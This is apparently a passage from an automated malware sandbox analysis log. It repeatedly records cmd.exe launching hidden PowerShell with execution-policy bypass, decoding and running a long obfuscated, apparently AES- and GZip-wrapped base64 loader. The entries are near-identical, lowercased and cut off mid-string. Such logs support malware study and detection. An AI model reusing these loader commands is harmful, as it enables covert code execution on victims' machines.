hzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhb